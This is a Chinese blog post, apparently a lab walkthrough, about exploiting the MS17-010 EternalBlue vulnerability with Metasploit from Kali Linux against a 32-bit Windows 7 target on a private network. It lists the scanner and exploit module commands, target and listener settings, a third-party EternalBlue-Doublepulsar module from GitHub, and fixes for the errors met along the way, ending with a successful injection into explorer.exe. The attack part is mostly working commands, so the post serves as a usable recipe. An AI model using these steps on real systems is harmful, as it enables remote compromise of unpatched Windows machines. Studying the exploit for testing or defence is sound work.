linux攻击主机msfconsole,关于利用kali linux2017.2中MSFCONSOLE 利用MS17-010漏洞发起攻击的坑...

1、直接使用msfconsole中自带的 “ms17_010_eternalblue”模块

攻击机:192.168.148.134  kali linux2017.2  x64

靶机:192.168.148.137     win7   x32

1.1先用msfconsole的smb模块扫描,看看是否有漏洞

use auxiliary/scanner/smb/smb_ms17_010auxiliary(smb_ms17_010) > set RHOSTS 192.168.148.137 若要范围扫描,则将IP改为 192.168.148.*

存在漏洞!!

0e5dfa02b5563b289a8ecb50258eb665.png

1.2使用模块

use exploit/windows/smb/ms17_010_eternalblue

show options

dce74c28b6280848754ad5c7f602ccf3.png

设置目标:

set rhost 192.168.148.137

设置payload等

set lhost 192.168.148.134

set lport 4444run

结果:

c88ea97562dd9b23868b43cd31876f59.png

这里提示我们 架构选择不对,我们再来看看target

c4339e7ab40f0329fe7acd5476dd27f8.png

这个x64括号是指什么?

不知道,难道是payload设置错了?

884b9b0956061b33c066a12a4e3861a4.png

这里用了show payloads,发现 这里可选择的payload都是64位的,我们的目标机是32位的,所以提示我们架构不对。

这时候,这个msf自带的模块似乎不能用。

2、使用github上的模块

https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit/

2.1复制到ROOT目录,解压

2.2 将Github下载来的eternalblue_doublepulsar.rb,拷贝到 /usr/share/metasploit-framework/modules/exploits/windows/smb目录中。

2.3打开msf,

执行reload_all

0d588338aabc71d5b484850a29725ef9.png

2.4调用模块

use exploit/windows/smb/eternalblue_doublepulsar

a7a86e23db04983e2e7881a66e016286.png

2.5查看选项

24c1ce8dbb9f75eaf7253b317089599e.png

2.6设置

925854deb505a9522f9dadd1a964c42d.png

由于目标是win7 32 位,所以target选8(默认),然后run

2.7run

当执行exploit出现问题该如何解决?

3b884015d40af2a752478e9a24808279.png

打开多架构支持/安装wine32。wine -h

2.8再次run

db7cc8a6ed7aad1915efc6d45e5c358d.png

又报错,这时候,我们修改注入进程

set processinject explorer.exe

run

65932b5bb246e0f5f4ecce4e02065d57.png

注入成功

ed2d5ac200c4afbb4aa5c27b09b1a648.png

截屏

41b2fb58cd993ae8862450bef3a7b933.png

19dafeb6397263d6417b3a41138ceffd.png

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值